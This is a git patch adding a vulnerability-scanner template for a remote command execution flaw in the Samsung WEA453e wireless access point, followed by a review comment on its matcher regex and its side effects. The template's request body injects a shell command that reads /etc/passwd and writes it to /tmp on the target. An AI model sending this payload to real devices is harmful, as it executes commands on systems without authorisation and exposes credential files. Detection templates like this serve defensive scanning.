From 3f3f9b9f439eb32104064ee063f17e81f9381c9d Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Mon, 15 Feb 2021 06:17:07 +0000
Subject: [PATCH] Create samsung-wlan-ap-rce.yaml
---
.../other/samsung-wlan-ap-rce.yaml | 24 +++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 vulnerabilities/other/samsung-wlan-ap-rce.yaml
diff --git a/vulnerabilities/other/samsung-wlan-ap-rce.yaml b/vulnerabilities/other/samsung-wlan-ap-rce.yaml
new file mode 100644
index 0000000000..7a9c40e2af
--- /dev/null
+++ b/vulnerabilities/other/samsung-wlan-ap-rce.yaml
@@ -0,0 +1,24 @@
+id: samsung-wlan-ap-rce
+
+info:
+ name: Samsung Wlan AP (WEA453e) RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/(download)/tmp/poc.txt"
+ body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[0*]:0:0"
+ - "bin:[x]:1:1"
+ part: body
+ - type: status
+ status:
+ - 200
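Review bot: The regex matcher is both too narrow and too loose: `"root:[0*]:0:0"` accepts only `0` or `*` in the password field, so the common `root:x:0:0` entry is never matched by it, and because patterns inside one matcher are OR-ed by default, a 200 body containing just `bin:x:1:1` is enough to report a critical finding. A single pattern such as `- "root:.*:0:0:"` would cover the usual passwd layouts and remove the weak fallback. The check is also not read-only: the request body leaves a copy of /etc/passwd in `/tmp/poc.txt` on the scanned device under a fixed name, which may let a later re-scan match on a stale file. The `info` block should state this, for example `description: "Intrusive check - writes /tmp/poc.txt on the target."`, so operators know to clean up after a scan.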